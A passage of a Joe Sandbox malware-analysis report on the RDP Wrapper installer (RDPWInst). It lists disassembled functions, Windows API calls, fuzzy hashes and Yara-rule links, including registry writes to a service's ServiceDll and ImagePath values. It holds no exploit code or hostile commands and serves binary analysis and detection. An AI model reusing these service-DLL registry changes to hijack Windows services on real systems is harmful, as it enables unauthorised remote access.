                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                    • String ID:
                                                    • API String ID: 3490077880-0
                                                    • Opcode ID: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                    • Instruction ID: 823ae625d887489e04d5fb836baef855571e76b59bd7737af2fa314308855dda
                                                    • Opcode Fuzzy Hash: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                    • Instruction Fuzzy Hash: 0D316F749002508BEF21BF69988975737A0AB05319F1640BFE806AB2D7C77C9CA4CB9D
                                                    Function 00406218 Relevance: 4.6, APIs: 3, Instructions: 76threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                    • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                    • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                      • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                      • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                      • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                      • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                    • String ID:
                                                    • API String ID: 3490077880-0
                                                    • Opcode ID: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                    • Instruction ID: 46b61aa2349ed196f7bea0abd1f985a96ea7bcfce35a4251490327c9ac1ca2fd
                                                    • Opcode Fuzzy Hash: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                    • Instruction Fuzzy Hash: 1331A2749002908BDF21BF78888975737A0AB06319F1640BFE845AB2D7C37C9CA4CB9D
                                                    Function 0040621C Relevance: 4.6, APIs: 3, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                    • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                    • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                      • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                      • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                      • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                      • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                    • String ID:
                                                    • API String ID: 3490077880-0
                                                    • Opcode ID: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                    • Instruction ID: d971c45546d1ba4d910c131f5b4d15d6df32f901540fb653785064192c66a389
                                                    • Opcode Fuzzy Hash: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                    • Instruction Fuzzy Hash: 712191749002508BDF21BF79988975737A0AB06319F1640BFE806AB2C7C37C9CA4CB9D
                                                    Function 00402990 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00402F9F,?,00402C72), ref: 004029A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: $zD$$zD
                                                    • API String ID: 4275171209-354537599
                                                    • Opcode ID: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                    • Instruction ID: 5217acd6ab2d11c2bd36ab0357f96252e91eb64f60a530f80fec48377855cdbd
                                                    • Opcode Fuzzy Hash: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                    • Instruction Fuzzy Hash: 8AF062F1B143004FDB45CF799D853157AD1A78A318F20807EE608EB7E8EBB484468B48
                                                    Function 004069D4 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SysFreeString.OLEAUT32(00000000), ref: 004068D2
                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 004069DF
                                                    • SysFreeString.OLEAUT32(?), ref: 004069F1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: String$Free$Alloc
                                                    • String ID:
                                                    • API String ID: 986138563-0
                                                    • Opcode ID: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                    • Instruction ID: fb71732fc0ca27c4a1f64b9cddcd98791c7700d24e5edf769cc3926ad45b99af
                                                    • Opcode Fuzzy Hash: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                    • Instruction Fuzzy Hash: D6E08CB91022017DEA002F228D14B3B3368AF82311B6980BFB401BA2D1D67C88419A3C
                                                    Function 004398F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 0043991B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: QueryValue
                                                    • String ID: ImagePath
                                                    • API String ID: 3660427363-1008103227
                                                    • Opcode ID: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                    • Instruction ID: d4c3dc3867a5d7f93f9a48779984ca1be9368a485682844844f209d8ad6df9e6
                                                    • Opcode Fuzzy Hash: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                    • Instruction Fuzzy Hash: C0019E76604208AFDB00EFA9CC81EDFB7A8EB49314F00817AB954D7342DA749E048BA5
                                                    Function 004399A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Open
                                                    • String ID: $sD
                                                    • API String ID: 71445658-3047594130
                                                    • Opcode ID: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                    • Instruction ID: 93af5e93b009f9dfb1ca8860ce5652d254f583336edc44d6a4486ea6cd266cab
                                                    • Opcode Fuzzy Hash: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                    • Instruction Fuzzy Hash: 19017571B04208AFD714EB65CC52A9EB3FCEB4C304F61457BF445E3281DA79EE149658
                                                    Function 0043987C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,ServiceDll,?,?), ref: 004398AE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID: ServiceDll
                                                    • API String ID: 3702945584-3252591312
                                                    • Opcode ID: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                    • Instruction ID: 396de0d2a0ab042baed8acc32e75219307ae4a3dd24f7b0442dd3090ee3af4a1
                                                    • Opcode Fuzzy Hash: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                    • Instruction Fuzzy Hash: 74018671A042086FD750EBAEDC81A9FBBEC9F49324F00806AF958E7382D9799D049765
                                                    Function 00439D1C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004399A0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00439D81,?,00447324), ref: 00439D5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseOpen
                                                    • String ID: $sD
                                                    • API String ID: 47109696-3047594130
                                                    • Opcode ID: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                    • Instruction ID: e2b80e318971c5615629c962b670a86c0d36aae3c059df6a015560dc8872c8c4
                                                    • Opcode Fuzzy Hash: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                    • Instruction Fuzzy Hash: F9013171E14304EFDB05CFA9C892A5DB7F8EB4D310F6140B6E810A7351D675EE10DA54
                                                    Function 0043924C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,004392B4,?,?,ImagePath,00000000,004392B4), ref: 0043927D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: QueryValue
                                                    • String ID: ImagePath
                                                    • API String ID: 3660427363-1008103227
                                                    • Opcode ID: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                    • Instruction ID: 752c998736a6c6af0e84b74aa330b189edc71255cbbe141243c37e1b481e64ab
                                                    • Opcode Fuzzy Hash: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                    • Instruction Fuzzy Hash: 90F01CA23042406FD744EA6E9C81F6B96DCDBCC714F14443EB288C7282D968CC098769
                                                    Function 004389D8 Relevance: 3.1, APIs: 2, Instructions: 98registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A52
                                                    • RegCreateKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A8C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateOpen
                                                    • String ID:
                                                    • API String ID: 436179556-0
                                                    • Opcode ID: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                    • Instruction ID: 0ee4ecbf886d923d9c7bbf31fd477b4cbe2ff9aaa7d825c43a2ca86d525438e5
                                                    • Opcode Fuzzy Hash: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                    • Instruction Fuzzy Hash: E3315C70B04348AFDB11EBA98842B9EF7F9AB48304F50447EB544E7282DA78AF059759
                                                    Function 0040920C Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                      • Part of subcall function 0040941C: lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                      • Part of subcall function 0040941C: lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileLibraryLoadModuleNamelstrcpynlstrlen
                                                    • String ID:
                                                    • API String ID: 2912033995-0
                                                    • Opcode ID: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                    • Instruction ID: f6262d892358e01f8eacd9344567111696420312dcbdab07fa653b046a231d07
                                                    • Opcode Fuzzy Hash: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                    • Instruction Fuzzy Hash: 43114270A4421CABDB10EB51CD86BDD73B8DB04304F5144FBB509B72D1DA785E858A59
                                                    Function 0040F77C Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F788
                                                    • GetLastError.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F79A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 1799206407-0
                                                    • Opcode ID: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                    • Instruction ID: 8407d2a862a87125c88b0e9e376b57c3f61afd3adb54f06dd13a213247f2bd06
                                                    • Opcode Fuzzy Hash: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                    • Instruction Fuzzy Hash: 5CE04F1732122016DD3530BC19CA6AB1244498B7A83280937FC51F3BD2D23E4D5B519F
                                                    Function 004046C0 Relevance: 3.0, APIs: 2, Instructions: 29fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004046DF
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004046E8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID:
                                                    • API String ID: 442123175-0
                                                    • Opcode ID: 1c195610d2d2e68796caa6713af8b8095328086dc3c63ffe84f07c697ca82352
